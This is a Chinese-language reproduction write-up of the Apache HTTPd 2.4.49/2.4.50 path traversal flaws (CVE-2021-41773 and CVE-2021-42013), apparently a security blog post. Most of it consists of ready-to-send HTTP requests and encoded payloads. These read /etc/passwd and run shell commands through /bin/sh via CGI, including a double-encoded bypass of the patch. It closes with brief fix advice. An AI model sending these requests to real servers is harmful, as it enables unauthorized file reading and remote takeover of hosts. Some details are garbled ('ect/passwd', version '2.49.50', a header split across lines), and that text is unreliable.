Apache CVE-2021-41773漏洞复现

漏洞简介

Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新，披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善，攻击者可构造恶意请求绕过补丁，利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持，攻击者可构造恶意请求执行命令，控制服务器。

影响版本

Apache HTTPd 2.4.49
Apache HTTPd 2.4.50

漏洞条件

1.配置目录遍历,并且开启cgi mode
2.Apache HTTPd版本为2.4.49/2.4.50
3.存在cgi-bin和icons文件夹

漏洞复现

GET 请求包 目录穿越:

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: z
h-CN,zh;q=0.9
Connection: close

payload:

/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ect/passwd

POST 请求包 命令执行:

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

echo;whoami

payload:

/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

echo;whoami

Apache HTTPd 2.49.50对上一个版本的修复不完整，导致50版本也存在该漏洞
GET payload:

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

POST payload:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

echo;whoami

​ 在上一个版本payload的基础上再进行一次url编码即可

修复建议

1.升级至2.49.50以上版本
2.关闭目录遍历功能
3.关闭cgi mode